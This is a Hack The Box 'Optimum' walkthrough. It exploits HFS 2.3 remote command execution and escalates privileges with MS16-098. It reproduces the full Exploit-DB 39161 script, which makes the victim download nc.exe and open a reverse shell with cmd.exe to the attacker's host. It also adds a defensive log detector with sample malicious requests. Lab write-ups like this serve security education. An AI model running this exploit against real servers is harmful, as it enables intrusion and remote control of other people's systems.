Hack The Box – Optimum Walkthrough
Introduction
This was an easy Windows box that involved exploiting a remote command execution vulnerability in the Rejetto HTTP File Server web application to gain an initial foothold and exploiting an overflow vulnerability in a version of Windows 8.1 (MS16-098) to escalate to system.
Enumeration
The first step is to run a TCP Nmap scan against the 1000 most common ports, using the following flags:
- -sC to run default scripts
- -sV to enumerate applications versions
- -Pn to skip the host discovery phase, as some hosts will not respond to ping requests
Enumerating the HTTP Port
When navigating to the web server, it appears to be running HTTP File Server (HFS) 2.3.
HTTP File Server is used to send and receive files through a web application. Using searchsploit to look for known exploits affecting this version of HTTP File Server:
Exploiting Remote Command Execution in HFS 2.3
After trying a few of the available exploits, 39161.py was the one that worked. The vulnerability allows arbitrary commands to be executed on the server through the search parameter.
The script requires a Netcat binary to be hosted on a web server on port 80. It creates a VBScript on the victim that connects to that web server and downloads the binary (script_create function), runs the script (execute_script function), and then launches Netcat to connect back to a listener as a reverse shell (nc_run function).
# Python 2 script (urllib2 and the print statement): Exploit-DB 39161, HFS 2.3.x remote command execution.
import urllib2
import sys

try:
    # Each request goes through the search parameter; the leading %00 is what lets the
    # {.macro.} reach HFS's macro engine, which then runs it server-side.
    def script_create():
        urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+save+".}")

    def execute_script():
        urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe+".}")

    def nc_run():
        urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe1+".}")

    ip_addr = "192.168.44.128"  # local IP address (host serving nc.exe and running the listener)
    local_port = "443"          # local port number the Netcat listener is bound to
    # URL-encoded VBScript, written to C:\Users\Public\script.vbs, that fetches nc.exe over HTTP
    vbs = "C:\Users\Public\script.vbs|dim%20xHttp%3A%20Set%20xHttp%20%3D%20createobject(%22Microsoft.XMLHTTP%22)%0D%0Adim%20bStrm%3A%20Set%20bStrm%20%3D%20createobject(%22Adodb.Stream%22)%0D%0AxHttp.Open%20%22GET%22%2C%20%22http%3A%2F%2F"+ip_addr+"%2Fnc.exe%22%2C%20False%0D%0AxHttp.Send%0D%0A%0D%0Awith%20bStrm%0D%0A%20%20%20%20.type%20%3D%201%20%27%2F%2Fbinary%0D%0A%20%20%20%20.open%0D%0A%20%20%20%20.write%20xHttp.responseBody%0D%0A%20%20%20%20.savetofile%20%22C%3A%5CUsers%5CPublic%5Cnc.exe%22%2C%202%20%27%2F%2Foverwrite%0D%0Aend%20with"
    save = "save|" + vbs    # HFS "save" macro: write the VBScript to disk
    vbs2 = "cscript.exe%20C%3A%5CUsers%5CPublic%5Cscript.vbs"
    exe = "exec|"+vbs2      # HFS "exec" macro: run the downloader script
    vbs3 = "C%3A%5CUsers%5CPublic%5Cnc.exe%20-e%20cmd.exe%20"+ip_addr+"%20"+local_port
    exe1 = "exec|"+vbs3     # HFS "exec" macro: start the reverse shell
    script_create()
    execute_script()
    nc_run()
except:
    print """[.]Something went wrong..!
    Usage is :[.] python exploit.py <Target IP address> <Target Port Number>
    Don't forgot to change the Local IP address and Port number on the script"""
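From the defensive side, the three requests above leave a very recognisable trace in the HFS access log: a search parameter that begins with a NUL byte and carries a {.save|...} or {.exec|...} macro. The following detector is an added example written for this walkthrough, not part of Exploit-DB 39161 or of HFS; the log lines it scans are constructed, and the log format is assumed to be a plain combined-style line with the request in quotes.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not real traffic): two benign searches and
# two requests shaped like the HFS 2.3 search-macro abuse used in the exploit.
SAMPLE_LOG = """\
10.10.14.5 - - [01/Jan/2020:10:00:01 +0000] "GET /?search=report HTTP/1.1" 200 512
10.10.14.5 - - [01/Jan/2020:10:00:02 +0000] "GET /?search=%00{.+save|C%3A%5CUsers%5CPublic%5Cscript.vbs|dim%20xHttp.} HTTP/1.1" 200 10
10.10.14.5 - - [01/Jan/2020:10:00:03 +0000] "GET /?search=%00{.+exec|cscript.exe%20C%3A%5CUsers%5CPublic%5Cscript.vbs.} HTTP/1.1" 200 10
10.10.14.7 - - [01/Jan/2020:10:00:04 +0000] "GET /?search=budget%202020 HTTP/1.1" 200 512
"""

# Assumed log shape: the request line sits in double quotes as METHOD TARGET HTTP/x.y
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# An HFS macro opens with "{." and the first token, up to the "|", is the macro verb
# (save, exec, ...); the exploit puts a "+" (a space once URL-decoded) after "{.".
MACRO_RE = re.compile(r'\{\.\+?\s*(?P<verb>[A-Za-z_]+)\|')


def inspect_request(target):
    """Return {"verb": ..., "payload": ...} when the request target carries an HFS
    macro behind a NUL byte in the search parameter, otherwise None."""
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    for value in query.get("search", []):       # parse_qs already URL-decodes %00
        if "\x00" not in value:                 # the NUL is the filter-bypass marker
            continue
        match = MACRO_RE.search(value)
        if match:
            return {"verb": match.group("verb"), "payload": value}
    return None


def scan_log(text):
    """Return a list of (client_ip, macro_verb) for every suspicious line in text."""
    findings = []
    for line in text.splitlines():
        req = REQUEST_RE.search(line)
        if not req:
            continue
        hit = inspect_request(req.group("target"))
        if hit:
            findings.append((line.split(" ", 1)[0], hit["verb"]))
    return findings


if __name__ == "__main__":
    for ip, verb in scan_log(SAMPLE_LOG):
        print("HFS macro via search parameter from %s: %s" % (ip, verb))
```

A NUL byte in a search string has no legitimate use, so matching on it alone keeps the rule tight; upgrading HFS past 2.3b removes the underlying macro-filter bypass.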
Copying the Netcat binary to the current directory:
Setting up a Python web server to host the Netcat executable:
The next step is to set up a Netcat listener, which will catch our reverse shell when it is executed by the victim host, using the following flags:
- -l to listen for incoming connections
- -v for verbose output
- -n to skip the DNS lookup
- -p to specify the port to listen on
When executing the script with the IP address and port of the victim host, a reverse shell is received on the listener:
Privilege Escalation
Using the systeminfo Windows command to gather information about the operating system version and build, and saving the output to a text file for further enumeration:
Running Windows Exploit Suggester to find known vulnerabilities:
Found a valid exploit for MS16-098, which abuses an integer overflow affecting the 'RGNOBJ' object:
Downloading the executable file from the link in the Exploit-DB page:
Transferring the binary to the victim host using the certutil tool:
Executing the exploit grants SYSTEM-level access to the box:
Conclusion
This was a really easy box, but still interesting nonetheless. I had come across the HTTP File Server web application in previous challenges so this wasn't new to me, but it was a good chance to do some research on the privilege escalation vector and how it was exploited.
More information about this exploit can be found at this article.